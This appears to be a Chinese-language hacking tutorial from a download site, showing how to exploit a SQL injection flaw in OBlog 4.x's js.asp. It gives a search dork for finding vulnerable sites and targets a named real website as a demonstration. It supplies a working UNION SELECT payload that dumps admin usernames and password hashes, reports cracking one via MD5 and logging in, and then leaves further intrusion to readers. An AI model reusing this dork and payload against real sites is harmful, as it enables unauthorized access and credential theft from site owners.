点击获取更多： OBlog,注入,漏洞,入侵 相关下载

　

大家好啊，我是零一。。。。留下QQ吧。。呵。。很多朋友发邮件来要的：53466495

今天带来个 最新OBlog 4.x(JS.ASP) 注入漏洞入侵

你可以去“Google” or “Baidu”

关键字：inurl:/blog/js.asp 嗯，我已经搜了~在这里我也就不找了。。。找一个站点给大家演示！

就可以找出很多这样的站。。。。

下面开始吧。。。。好好看啊~呵~

http://www.51callcenter.com/blog/js.asp?j=0&classid=all&subjectname=0&classname=0&tlen=30&n=7&sdate=990&orders=2&info=0&action=1&user=

就拿这个站点做小白鼠吧~哈。。。

利用方法：
http://www.xxx.com/js.asp?n=1&j=13&tid=1) and 1=2 union select username,password,3,4,5,6 from oblog_admin where id=(1

document.write('

');
呵。。。

看到没啊！

document.write('<ul><li><a href="group.asp?gid=admin&pid=2464441ba58aeecb" target="_blank"></a></li></ul>');

用户名和密码就出来了~

我们直接上MD5解密~OK了~

123000 哈哈。。密码奥~
我们看能不能登录啊！

郁闷。。。卡~

呵。。。我刚才已经登录过了..COOKIES..呵呵。。。

接下来的事情大家自己去做吧~

如果还有什么不懂的话，可以加QQ问，也可以上论坛去提问。。。

嗯，就这样了。。。

砸门下次教程再见！88

* 注意:下载本站软件请使用迅雷软件下载，速度更快、更稳定。 本站统一解压密码为:www.05112.org
* 如果是下载黑客相关软件，请注意自行杀毒！
* 如果您发现该软件不能下载，请通知管理员，谢谢！
* 未经本站明确许可，任何网站不得非法盗链及抄袭本站资源；如引用页面，请注明来自本站，谢谢您的支持！
* 本站软件均收集于网络，如有侵犯您的产权请及时联系我们，我们会在得到反映的24小时内删除这些下载及相应信息！